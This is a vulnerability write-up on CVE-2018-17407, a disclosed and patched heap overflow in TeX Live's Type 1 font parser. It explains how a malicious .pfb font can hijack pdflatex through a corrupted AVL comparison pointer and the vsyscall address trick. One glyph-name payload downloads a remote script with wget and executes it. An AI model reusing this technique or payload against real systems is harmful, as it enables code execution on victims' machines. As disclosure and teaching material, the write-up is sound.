This post is about a heap memory corruption vulnerability in TeX Live, the popular distribution of LaTeX. I couldn’t resist writing a full exploit for it, so the majority of this writeup demonstrates how the bug can be leveraged for an arbitrary code execution attack when pdflatex is run on a poisoned input.

Summary

CVE-2018-17407 is a heap buffer overflow caused by the unsafe processing of Type 1 font files (.pfb files). I reported it to the developers on Sept 12, 2018, and a patch was rolled out with a public security advisory on Sept 21, 2018. It affects the following tools in the TeX Live suite: pdflatex, pdftex, dvips, and luatex. To trigger the buffer overflow, a malicious font must be processed by one of the vulnerable tools. Fonts are found and loaded automatically, so a feasible attack could be mounted by planting a malicious font in a shared repository in which other users might run pdflatex. See this page for more information about affected versions and tracking. The vulnerable code was also forked by the MiKTeX project and has been fixed in MiKTeX 2.9.6840.

I was initially using the AFL fuzzer on dvips, a tool for converting DVI files into PS files. DVI files are quite compact binary files which are typically converted to PDF or PostScript for visualization. The DVI filetype doesn’t support embedding fonts, so DVI files instead refer to font names they expect to find on the system during visualization. What happened is that AFL randomly mutated the name of a font in the DVI file and discovered another valid font on my own system all by itself! The font that it discovered had particularly short line lengths, which led to some false positive alerts from Address Sanitizer when parsing it. While investigating those false positives, I eventually stumbled upon the following vulnerable function by manual inspection:

    static void t1_check_unusual_charstring(void)
    {
        char *p = strstr(t1_line_array, charstringname) + strlen(charstringname);
        int i;
        /* if no number follows "/CharStrings", let's read the next line */
        if (sscanf(p, "%i", &i) != 1) {
            strcpy(t1_buf_array, t1_line_array);
            *(strend(t1_buf_array) - 1) = ' ';
            t1_getline();
            strcat(t1_buf_array, t1_line_array);
            strcpy(t1_line_array, t1_buf_array);
            t1_line_ptr = eol(t1_line_array);
        }
    }

This function handles a special case in which a logical line of the font file may be split into two input lines. It reads them both and concatenates them together into t1_buf_array with a call to strcat(), but without a bounds check! Oops: two lines are stored into the space for one. The buffers here (t1_line_array and t1_buf_array) are managed automatically with a set of macros. By crafting long lines in a .pfb file we can grow these buffers to arbitrary sizes, and then use a “/CharStrings” line to trigger the overflow. This provides us with a very powerful heap memory corruption primitive for two reasons: (1) we get to choose the size of the buffer, which gives us a high degree of influence on where the allocator positions it, and (2) we can overflow the buffer by its full (and arbitrarily chosen) size, giving us a far reach into whatever objects live in nearby memory.

However, there are two complications. First, this bug isn’t triggered until closefilesandterminate() is called, which as the name suggests doesn’t leave us much time to make use of our memory corruption capability before the program exits. Second, strcat() doesn’t copy null bytes, which makes exploitation significantly trickier than it would be with an equivalent memcpy() overflow.

This same vulnerable function is used by other tools in TeX Live: pdflatex, pdftex, dvips, and luatex.
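
To make the missing bounds check concrete, here is a minimal sketch of a checked version of the two-line join. It is not the actual TeX Live patch, and it is simplified: it inserts a space between the two lines rather than overwriting the last character of the first one. The name join_lines and its parameters are hypothetical and exist only for this illustration.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper, not TeX Live code: joins `first` and `second`
 * with a single space into `dst`, which has room for `cap` bytes.
 * Returns 0 on success, or -1 if the result plus its terminating NUL
 * would not fit, in which case `dst` is left untouched. */
static int join_lines(char *dst, size_t cap,
                      const char *first, const char *second)
{
    size_t n1 = strlen(first);
    size_t n2 = strlen(second);

    /* Need n1 + 1 (space) + n2 + 1 (NUL) <= cap. The comparison is
     * arranged so that no intermediate sum can wrap around. */
    if (cap < 2 || n1 > cap - 2 || n2 > cap - 2 - n1)
        return -1;

    memcpy(dst, first, n1);
    dst[n1] = ' ';
    memcpy(dst + n1 + 1, second, n2 + 1);   /* n2 + 1 copies the NUL too */
    return 0;
}
```

A caller would either grow the destination and retry when -1 is returned, or reject the font. The vulnerable function did neither, which is what lets a second long line run past the end of the buffer.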
I only built an exploit for pdflatex, the most widely used of the vulnerable tools. A detail I ignore in this writeup is that .pfb files include some “encrypted” (scrambled) sections as well as checksum verification, so I built a simple .pfb file creator that converts plain-text payloads into valid .pfb files, making it easy to set file contents as desired. It’s also worth noting that this checksum verification would have prevented a blind fuzzer from reaching this vulnerability, as LaTeX stops processing a font when the checksum for a file section fails.

To begin evaluating how the bug might be exploited, I wrote and embedded a scanner into pdflatex that probed all of the code pointers stored in the heap to check if any of them are used in the small window of time between the overflow and pdflatex exiting. There were a couple of hits! I traced them down to the following data structure:

    /* Tree data structure. */
    struct avl_table
    {
        struct avl_node *avl_root;          /* Tree's root. */
        avl_comparison_func *avl_compare;   /* Comparison function. */
        void *avl_param;                    /* Extra argument to |avl_compare|. */
        struct libavl_allocator *avl_alloc; /* Memory allocator. */
        size_t avl_count;                   /* Number of items in tree. */
        unsigned long avl_generation;       /* Generation number. */
    };

TeX Live makes heavy use of AVL trees for managing generic objects, including strings, images and font glyphs. The avl_compare function pointer is used for polymorphism-like behavior in C, allowing a range of comparison functions to be implemented for different kinds of objects. By controlling avl_compare, we have the opportunity to hijack the control-flow of pdflatex when the program later uses its AVL tree. And, fortunately, these code pointers are used in the termination routines and thus serve as viable targets!

Having chosen a target structure, the next step is to arrange the heap such that the victim struct avl_table is located in memory directly after the t1_buf_array from which we can overflow. I wrote a simple brute force heap manipulator that generates LaTeX documents, and ran it to find exploitable heap layouts. After several thousand heap arrangement attempts, it found an optimal layout with a distance of only 16 bytes (the minimum possible including the allocator metadata) between the end of the buffer and the first field of the victim struct.
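
The polymorphism-like role of avl_compare can be illustrated with a small self-contained sketch. This is not libavl code: mini_table, mini_find and cmp_int are hypothetical names, and a sorted array stands in for the tree. The only point is that every lookup makes an indirect call through a pointer stored in a heap-resident struct, which is why that single field is such an attractive target.

```c
#include <stddef.h>

/* Comparison callback with an extra user parameter (hypothetical type). */
typedef int compare_func(const void *a, const void *b, void *param);

/* Hypothetical stand-in for a tree table: a sorted array plus the
 * comparison callback that gives the container its "type". */
struct mini_table {
    const void **items;     /* items sorted according to `compare` */
    compare_func *compare;  /* called indirectly on every lookup */
    void *param;            /* passed through to `compare` */
    size_t count;           /* number of items */
};

/* One possible callback: orders items as ints. */
static int cmp_int(const void *a, const void *b, void *param)
{
    (void)param;
    int x = *(const int *)a;
    int y = *(const int *)b;
    return (x > y) - (x < y);
}

/* Binary search; returns the matching item or NULL if none matches. */
static const void *mini_find(const struct mini_table *t, const void *key)
{
    size_t lo = 0, hi = t->count;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        /* The indirect call: control goes wherever `compare` points. */
        int c = t->compare(key, t->items[mid], t->param);
        if (c == 0)
            return t->items[mid];
        if (c < 0)
            hi = mid;
        else
            lo = mid + 1;
    }
    return NULL;
}
```

Swapping cmp_int for a string or glyph comparator changes the container's behavior without touching mini_find. The same flexibility means that whoever controls the stored pointer controls where the next lookup jumps.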
Note that this stage would need to be rerun for a new TeX input file, although the same font payload could be reused; it’s also likely that more robust heap spraying could be done, but I didn’t spend any time doing so.

After positioning the victim struct to follow the buffer we can overflow, we can proceed to overwrite the fields of the avl_table. Because the text section of the program is mapped to low virtual addresses, code pointers have multiple null bytes in their most significant bytes (and we can’t copy null bytes with strcat()). However, we can clobber avl_root and continue writing to just the least significant bytes of avl_compare (thanks to the little endian byte ordering on x86), which is already a valid code pointer and has appropriate null bytes in the high bits of the address. This allows us to redirect avl_compare to any code location of our choosing, but to do so we must overwrite avl_root. This is indeed problematic: all code locations that make use of avl_compare first issue an access from the avl_root pointer, causing a segmentation fault before we hijack control-flow. I found I could solve this issue with a clever trick. Let’s look at the memory layout of the pdflatex process with pmap:

    Address           Kbytes     RSS   Dirty Mode  Mapping
    0000000000400000    2460     832       0 r-x-- pdftex
    0000000000400000       0       0       0 r-x-- pdftex
    0000000000867000       8       8       4 r---- pdftex
    ...
    00007fbde01db000    1792    1296       0 r-x-- libc-2.23.so
    00007fbde01db000       0       0       0 r-x-- libc-2.23.so
    00007fbde039b000    2048       0       0 ----- libc-2.23.so
    ..
    00007fbde05a5000       0       0       0 r-x-- libm-2.23.so
    00007fbde06ad000    2044       0       0 ----- libm-2.23.so
    ...
    00007fff359bd000     132      20      20 rw--- [ stack ]
    ffffffffff600000       4       0       0 r-x-- [ anon ]
    ffffffffff600000       0       0       0 r-x-- [ anon ]

The bottom entry is the vsyscall region. It’s conveniently mapped to the high end of the virtual address space with no ASLR. And importantly, it contains addresses with no null bytes, such as 0xffffffffff600ffc. We can then use strcat() to write this static address over avl_root, and because it’s in a readable region the avl_root load completes without crashing the program. pdflatex then proceeds to load and use our corrupted function pointer.

The last piece of the puzzle is making use of our control-flow hijack. pdflatex has a few calls to system() lying around for supporting functionality such as running shell commands. For security reasons these are disabled unless the --shell-escape flag is set, but with our control-flow hijack we can evade these checks by simply jumping to the instructions in the code after the checks have already taken place.
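
The null-byte constraint on the pointer overwrites described above comes down to simple byte arithmetic, sketched here. The function name copyable_prefix_le is hypothetical, and 0x401234 is only an example of a low text-segment address, not a real target. The function counts how many bytes of an address, laid out in little endian order, a strcat()-style copy could transfer before stopping at the first zero byte.

```c
#include <stddef.h>
#include <stdint.h>

/* Number of leading non-zero bytes in the little endian encoding of `v`,
 * i.e. how many bytes a strcat()-style copy would transfer before it
 * stops at the first NUL. Bytes are extracted with shifts, so the
 * result does not depend on the byte order of the host. */
static size_t copyable_prefix_le(uint64_t v)
{
    size_t n = 0;
    while (n < 8 && ((v >> (8 * n)) & 0xff) != 0)
        n++;
    return n;
}
```

For an example code address such as 0x0000000000401234 the result is 3: only the low three bytes can be written, and the five high zero bytes must already be in place, which is why only the least significant bytes of an existing code pointer are touched. For 0xffffffffff600ffc the result is 8, so the whole value can be copied, whereas the page base 0xffffffffff600000 yields 0 and could not be written at all.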
The various call sites (and the various entry points to those call sites) give us a range of register (and stack-stored) values that we can prepare as arguments to system(). Additionally, the heap manipulator found several locations that use the corrupted AVL tree, and the hijack could be launched from any of them. One of these combinations allows us to erroneously set the input register to a char * pointer that points to the name of one of the glyphs being operated on! We can use it to redirect the name of the glyph from the font file to serve as an argument to system(). Its contents are loaded into memory from reading entries like these from the .pfb file:

    ...
    dup 45 /hyphen put
    dup 46 /period put
    dup 47 /slash put
    dup 48 /zero put
    dup 49 /one put
    dup 50 /two put
    dup 51 /three put
    dup 52 /four put
    ...

This means that we can simply modify our malicious font like so:

    dup 47 /COMMAND_HERE put

The string “COMMAND_HERE” will then be passed to system(). A last detail to clean up is that the parsing code stops reading the glyph name when it encounters a space, which at first seems quite limiting on how expressive our injected command can be. However, because sh interprets the string, we have a range of options for getting around this restriction using shell semantics. In particular, the Internal Field Separator (IFS) environment variable contains a space, a tab and a newline. Alternatively, brace expansion is another way to evade the space limitation. Using the IFS method we can then replace the glyph name with:

    dup 47 /wget${IFS}nickroessler.com/s${IFS}&&${IFS}chmod${IFS}+x${IFS}s${IFS}&&./s put

to encode “wget nickroessler.com/s && chmod +x s && ./s”.

And voila! We can now hijack pdflatex to do as we please. In this case, LaTeX downloads a shell script from the Internet and executes it with the permissions of the pdflatex process. The downloaded script prints “hello from shell!” before the program segfaults from its corrupted state.

I’d like to thank Norbert Preining and Karl Berry of the TeX Live team for their professional and quick responses and for being pleasant to work with on the patch.



